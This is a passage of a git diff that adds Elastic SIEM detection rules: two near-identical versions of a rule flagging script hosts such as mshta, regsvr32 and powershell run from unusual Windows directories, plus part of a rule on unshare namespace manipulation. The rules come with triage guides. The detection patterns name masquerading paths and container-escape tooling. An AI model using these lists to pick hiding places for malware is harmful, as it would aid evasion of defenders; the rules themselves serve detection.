"Domain: Endpoint", + "OS: Linux", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Rule Type: BBR", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.005", + "name": "Trap", + "reference": "https://attack.mitre.org/techniques/T1546/005/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "cf6995ec-32a9-4b2d-9340-f8e61acf3f4e_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/cff92c41-2225-4763-b4ce-6f71e5bda5e6_111.json b/packages/security_detection_engine/kibana/security_rule/cff92c41-2225-4763-b4ce-6f71e5bda5e6_111.json new file mode 100644 index 00000000000..da4ac79fbc9 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/cff92c41-2225-4763-b4ce-6f71e5bda5e6_111.json @@ -0,0 +1,127 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies process execution from suspicious default Windows directories. This may be abused by adversaries to hide malware in trusted paths.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Execution from Unusual Directory - Command Line", + "note": "## Triage and analysis\n\n### Investigating Execution from Unusual Directory - Command Line\n\nThis rule looks for the execution of scripts from unusual directories. Attackers can use system or application paths to hide malware and make the execution less suspicious.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to determine which commands or scripts were executed.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of parent process executable and command line conditions.\n\n### Related rules\n\n- Process Execution from an Unusual Directory - ebfe1448-7fac-4d59-acea-181bd89b1f7f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : (\"wscript.exe\",\n \"cscript.exe\",\n \"rundll32.exe\",\n \"regsvr32.exe\",\n \"cmstp.exe\",\n \"RegAsm.exe\",\n \"installutil.exe\",\n \"mshta.exe\",\n \"RegSvcs.exe\",\n \"powershell.exe\",\n \"pwsh.exe\",\n \"cmd.exe\") and\n\n /* add suspicious execution paths here */\n process.args : (\"C:\\\\PerfLogs\\\\*\",\n \"C:\\\\Users\\\\Public\\\\*\",\n \"C:\\\\Windows\\\\Tasks\\\\*\",\n \"C:\\\\Intel\\\\*\",\n \"C:\\\\AMD\\\\Temp\\\\*\",\n \"C:\\\\Windows\\\\AppReadiness\\\\*\",\n \"C:\\\\Windows\\\\ServiceState\\\\*\",\n \"C:\\\\Windows\\\\security\\\\*\",\n \"C:\\\\Windows\\\\IdentityCRL\\\\*\",\n \"C:\\\\Windows\\\\Branding\\\\*\",\n \"C:\\\\Windows\\\\csc\\\\*\",\n \"C:\\\\Windows\\\\DigitalLocker\\\\*\",\n \"C:\\\\Windows\\\\en-US\\\\*\",\n \"C:\\\\Windows\\\\wlansvc\\\\*\",\n \"C:\\\\Windows\\\\Prefetch\\\\*\",\n \"C:\\\\Windows\\\\Fonts\\\\*\",\n \"C:\\\\Windows\\\\diagnostics\\\\*\",\n \"C:\\\\Windows\\\\TAPI\\\\*\",\n \"C:\\\\Windows\\\\INF\\\\*\",\n \"C:\\\\Windows\\\\System32\\\\Speech\\\\*\",\n \"C:\\\\windows\\\\tracing\\\\*\",\n \"c:\\\\windows\\\\IME\\\\*\",\n \"c:\\\\Windows\\\\Performance\\\\*\",\n \"c:\\\\windows\\\\intel\\\\*\",\n \"c:\\\\windows\\\\ms\\\\*\",\n \"C:\\\\Windows\\\\dot3svc\\\\*\",\n \"C:\\\\Windows\\\\panther\\\\*\",\n \"C:\\\\Windows\\\\RemotePackages\\\\*\",\n \"C:\\\\Windows\\\\OCR\\\\*\",\n \"C:\\\\Windows\\\\appcompat\\\\*\",\n \"C:\\\\Windows\\\\apppatch\\\\*\",\n \"C:\\\\Windows\\\\addins\\\\*\",\n \"C:\\\\Windows\\\\Setup\\\\*\",\n \"C:\\\\Windows\\\\Help\\\\*\",\n \"C:\\\\Windows\\\\SKB\\\\*\",\n \"C:\\\\Windows\\\\Vss\\\\*\",\n \"C:\\\\Windows\\\\servicing\\\\*\",\n \"C:\\\\Windows\\\\CbsTemp\\\\*\",\n \"C:\\\\Windows\\\\Logs\\\\*\",\n \"C:\\\\Windows\\\\WaaS\\\\*\",\n \"C:\\\\Windows\\\\twain_32\\\\*\",\n \"C:\\\\Windows\\\\ShellExperiences\\\\*\",\n \"C:\\\\Windows\\\\ShellComponents\\\\*\",\n \"C:\\\\Windows\\\\PLA\\\\*\",\n \"C:\\\\Windows\\\\Migration\\\\*\",\n \"C:\\\\Windows\\\\debug\\\\*\",\n \"C:\\\\Windows\\\\Cursors\\\\*\",\n \"C:\\\\Windows\\\\Containers\\\\*\",\n \"C:\\\\Windows\\\\Boot\\\\*\",\n \"C:\\\\Windows\\\\bcastdvr\\\\*\",\n \"C:\\\\Windows\\\\TextInput\\\\*\",\n \"C:\\\\Windows\\\\security\\\\*\",\n \"C:\\\\Windows\\\\schemas\\\\*\",\n \"C:\\\\Windows\\\\SchCache\\\\*\",\n \"C:\\\\Windows\\\\Resources\\\\*\",\n \"C:\\\\Windows\\\\rescache\\\\*\",\n \"C:\\\\Windows\\\\Provisioning\\\\*\",\n \"C:\\\\Windows\\\\PrintDialog\\\\*\",\n \"C:\\\\Windows\\\\PolicyDefinitions\\\\*\",\n \"C:\\\\Windows\\\\media\\\\*\",\n \"C:\\\\Windows\\\\Globalization\\\\*\",\n \"C:\\\\Windows\\\\L2Schemas\\\\*\",\n \"C:\\\\Windows\\\\LiveKernelReports\\\\*\",\n \"C:\\\\Windows\\\\ModemLogs\\\\*\",\n \"C:\\\\Windows\\\\ImmersiveControlPanel\\\\*\",\n \"C:\\\\$Recycle.Bin\\\\*\") and\n\n /* noisy FP patterns */\n\n not process.parent.executable : (\"C:\\\\WINDOWS\\\\System32\\\\DriverStore\\\\FileRepository\\\\*\\\\igfxCUIService*.exe\",\n \"C:\\\\Windows\\\\System32\\\\spacedeskService.exe\",\n \"C:\\\\Program Files\\\\Dell\\\\SupportAssistAgent\\\\SRE\\\\SRE.exe\") and\n not (process.name : \"rundll32.exe\" and\n process.args : (\"uxtheme.dll,#64\",\n \"PRINTUI.DLL,PrintUIEntry\",\n \"?:\\\\Windows\\\\System32\\\\FirewallControlPanel.dll,ShowNotificationDialog\",\n \"?:\\\\WINDOWS\\\\system32\\\\Speech\\\\SpeechUX\\\\sapi.cpl\",\n \"?:\\\\Windows\\\\system32\\\\shell32.dll,OpenAs_RunDLL\")) and\n\n not (process.name : \"cscript.exe\" and process.args : \"?:\\\\WINDOWS\\\\system32\\\\calluxxprovider.vbs\") and\n\n not (process.name : \"cmd.exe\" and process.args : \"?:\\\\WINDOWS\\\\system32\\\\powercfg.exe\" and process.args : \"?:\\\\WINDOWS\\\\inf\\\\PowerPlan.log\") and\n\n not (process.name : \"regsvr32.exe\" and process.args : \"?:\\\\Windows\\\\Help\\\\OEM\\\\scripts\\\\checkmui.dll\") and\n\n not (process.name : \"cmd.exe\" and\n process.parent.executable : (\"?:\\\\Windows\\\\System32\\\\oobe\\\\windeploy.exe\",\n \"?:\\\\Program Files (x86)\\\\ossec-agent\\\\wazuh-agent.exe\",\n \"?:\\\\Windows\\\\System32\\\\igfxCUIService.exe\",\n \"?:\\\\Windows\\\\Temp\\\\IE*.tmp\\\\IE*-support\\\\ienrcore.exe\"))\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "cff92c41-2225-4763-b4ce-6f71e5bda5e6", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.003", + "name": "Windows Command Shell", + "reference": "https://attack.mitre.org/techniques/T1059/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.005", + "name": "Match Legitimate Name or Location", + "reference": "https://attack.mitre.org/techniques/T1036/005/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "cff92c41-2225-4763-b4ce-6f71e5bda5e6_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/cff92c41-2225-4763-b4ce-6f71e5bda5e6_112.json b/packages/security_detection_engine/kibana/security_rule/cff92c41-2225-4763-b4ce-6f71e5bda5e6_112.json new file mode 100644 index 00000000000..615fd6367ab --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/cff92c41-2225-4763-b4ce-6f71e5bda5e6_112.json @@ -0,0 +1,127 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies process execution from suspicious default Windows directories. This may be abused by adversaries to hide malware in trusted paths.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Execution from Unusual Directory - Command Line", + "note": "## Triage and analysis\n\n### Investigating Execution from Unusual Directory - Command Line\n\nThis rule looks for the execution of scripts from unusual directories. Attackers can use system or application paths to hide malware and make the execution less suspicious.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to determine which commands or scripts were executed.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of parent process executable and command line conditions.\n\n### Related rules\n\n- Process Execution from an Unusual Directory - ebfe1448-7fac-4d59-acea-181bd89b1f7f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : (\"wscript.exe\",\n \"cscript.exe\",\n \"rundll32.exe\",\n \"regsvr32.exe\",\n \"cmstp.exe\",\n \"RegAsm.exe\",\n \"installutil.exe\",\n \"mshta.exe\",\n \"RegSvcs.exe\",\n \"powershell.exe\",\n \"pwsh.exe\",\n \"cmd.exe\") and\n\n /* add suspicious execution paths here */\n process.args : (\"C:\\\\PerfLogs\\\\*\",\n \"C:\\\\Users\\\\Public\\\\*\",\n \"C:\\\\Windows\\\\Tasks\\\\*\",\n \"C:\\\\Intel\\\\*\",\n \"C:\\\\AMD\\\\Temp\\\\*\",\n \"C:\\\\Windows\\\\AppReadiness\\\\*\",\n \"C:\\\\Windows\\\\ServiceState\\\\*\",\n \"C:\\\\Windows\\\\security\\\\*\",\n \"C:\\\\Windows\\\\IdentityCRL\\\\*\",\n \"C:\\\\Windows\\\\Branding\\\\*\",\n \"C:\\\\Windows\\\\csc\\\\*\",\n \"C:\\\\Windows\\\\DigitalLocker\\\\*\",\n \"C:\\\\Windows\\\\en-US\\\\*\",\n \"C:\\\\Windows\\\\wlansvc\\\\*\",\n \"C:\\\\Windows\\\\Prefetch\\\\*\",\n \"C:\\\\Windows\\\\Fonts\\\\*\",\n \"C:\\\\Windows\\\\diagnostics\\\\*\",\n \"C:\\\\Windows\\\\TAPI\\\\*\",\n \"C:\\\\Windows\\\\INF\\\\*\",\n \"C:\\\\Windows\\\\System32\\\\Speech\\\\*\",\n \"C:\\\\windows\\\\tracing\\\\*\",\n \"c:\\\\windows\\\\IME\\\\*\",\n \"c:\\\\Windows\\\\Performance\\\\*\",\n \"c:\\\\windows\\\\intel\\\\*\",\n \"c:\\\\windows\\\\ms\\\\*\",\n \"C:\\\\Windows\\\\dot3svc\\\\*\",\n \"C:\\\\Windows\\\\panther\\\\*\",\n \"C:\\\\Windows\\\\RemotePackages\\\\*\",\n \"C:\\\\Windows\\\\OCR\\\\*\",\n \"C:\\\\Windows\\\\appcompat\\\\*\",\n \"C:\\\\Windows\\\\apppatch\\\\*\",\n \"C:\\\\Windows\\\\addins\\\\*\",\n \"C:\\\\Windows\\\\Setup\\\\*\",\n \"C:\\\\Windows\\\\Help\\\\*\",\n \"C:\\\\Windows\\\\SKB\\\\*\",\n \"C:\\\\Windows\\\\Vss\\\\*\",\n \"C:\\\\Windows\\\\servicing\\\\*\",\n \"C:\\\\Windows\\\\CbsTemp\\\\*\",\n \"C:\\\\Windows\\\\Logs\\\\*\",\n \"C:\\\\Windows\\\\WaaS\\\\*\",\n \"C:\\\\Windows\\\\twain_32\\\\*\",\n \"C:\\\\Windows\\\\ShellExperiences\\\\*\",\n \"C:\\\\Windows\\\\ShellComponents\\\\*\",\n \"C:\\\\Windows\\\\PLA\\\\*\",\n \"C:\\\\Windows\\\\Migration\\\\*\",\n \"C:\\\\Windows\\\\debug\\\\*\",\n \"C:\\\\Windows\\\\Cursors\\\\*\",\n \"C:\\\\Windows\\\\Containers\\\\*\",\n \"C:\\\\Windows\\\\Boot\\\\*\",\n \"C:\\\\Windows\\\\bcastdvr\\\\*\",\n \"C:\\\\Windows\\\\TextInput\\\\*\",\n \"C:\\\\Windows\\\\security\\\\*\",\n \"C:\\\\Windows\\\\schemas\\\\*\",\n \"C:\\\\Windows\\\\SchCache\\\\*\",\n \"C:\\\\Windows\\\\Resources\\\\*\",\n \"C:\\\\Windows\\\\rescache\\\\*\",\n \"C:\\\\Windows\\\\Provisioning\\\\*\",\n \"C:\\\\Windows\\\\PrintDialog\\\\*\",\n \"C:\\\\Windows\\\\PolicyDefinitions\\\\*\",\n \"C:\\\\Windows\\\\media\\\\*\",\n \"C:\\\\Windows\\\\Globalization\\\\*\",\n \"C:\\\\Windows\\\\L2Schemas\\\\*\",\n \"C:\\\\Windows\\\\LiveKernelReports\\\\*\",\n \"C:\\\\Windows\\\\ModemLogs\\\\*\",\n \"C:\\\\Windows\\\\ImmersiveControlPanel\\\\*\",\n \"C:\\\\$Recycle.Bin\\\\*\") and\n\n /* noisy FP patterns */\n\n not process.parent.executable : (\"C:\\\\WINDOWS\\\\System32\\\\DriverStore\\\\FileRepository\\\\*\\\\igfxCUIService*.exe\",\n \"C:\\\\Windows\\\\System32\\\\spacedeskService.exe\",\n \"C:\\\\Program Files\\\\Dell\\\\SupportAssistAgent\\\\SRE\\\\SRE.exe\") and\n not (process.name : \"rundll32.exe\" and\n process.args : (\"uxtheme.dll,#64\",\n \"PRINTUI.DLL,PrintUIEntry\",\n \"?:\\\\Windows\\\\System32\\\\FirewallControlPanel.dll,ShowNotificationDialog\",\n \"?:\\\\WINDOWS\\\\system32\\\\Speech\\\\SpeechUX\\\\sapi.cpl\",\n \"?:\\\\Windows\\\\system32\\\\shell32.dll,OpenAs_RunDLL\")) and\n\n not (process.name : \"cscript.exe\" and process.args : \"?:\\\\WINDOWS\\\\system32\\\\calluxxprovider.vbs\") and\n\n not (process.name : \"cmd.exe\" and process.args : \"?:\\\\WINDOWS\\\\system32\\\\powercfg.exe\" and process.args : \"?:\\\\WINDOWS\\\\inf\\\\PowerPlan.log\") and\n\n not (process.name : \"regsvr32.exe\" and process.args : \"?:\\\\Windows\\\\Help\\\\OEM\\\\scripts\\\\checkmui.dll\") and\n\n not (process.name : \"cmd.exe\" and\n process.parent.executable : (\"?:\\\\Windows\\\\System32\\\\oobe\\\\windeploy.exe\",\n \"?:\\\\Program Files (x86)\\\\ossec-agent\\\\wazuh-agent.exe\",\n \"?:\\\\Windows\\\\System32\\\\igfxCUIService.exe\",\n \"?:\\\\Windows\\\\Temp\\\\IE*.tmp\\\\IE*-support\\\\ienrcore.exe\"))\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "cff92c41-2225-4763-b4ce-6f71e5bda5e6", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.003", + "name": "Windows Command Shell", + "reference": "https://attack.mitre.org/techniques/T1059/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.005", + "name": "Match Legitimate Name or Location", + "reference": "https://attack.mitre.org/techniques/T1036/005/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 112 + }, + "id": "cff92c41-2225-4763-b4ce-6f71e5bda5e6_112", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d00f33e7-b57d-4023-9952-2db91b1767c4_9.json b/packages/security_detection_engine/kibana/security_rule/d00f33e7-b57d-4023-9952-2db91b1767c4_9.json new file mode 100644 index 00000000000..354faddcc25 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d00f33e7-b57d-4023-9952-2db91b1767c4_9.json @@ -0,0 +1,99 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious usage of unshare to manipulate system namespaces. Unshare can be utilized to escalate privileges or escape container security boundaries. Threat actors have utilized this binary to allow themselves to escape to the host and access other resources or escalate privileges.", + "from": "now-9m", + "index": [ + "auditbeat-*", + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Namespace Manipulation Using Unshare", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action : (\"exec\", \"exec_event\") and\nprocess.executable: \"/usr/bin/unshare\" and\nnot process.parent.executable: (\"/usr/bin/udevadm\", \"*/lib/systemd/systemd-udevd\", \"/usr/bin/unshare\") and\nnot process.args == \"/usr/bin/snap\" and not process.parent.name in (\"zz-proxmox-boot\", \"java\")\n", + "references": [ + "https://man7.org/linux/man-pages/man1/unshare.1.html", + "https://www.crowdstrike.com/blog/cve-2022-0185-kubernetes-container-escape-using-linux-kernel-exploit/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "d00f33e7-b57d-4023-9952-2db91b1767c4", + "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: 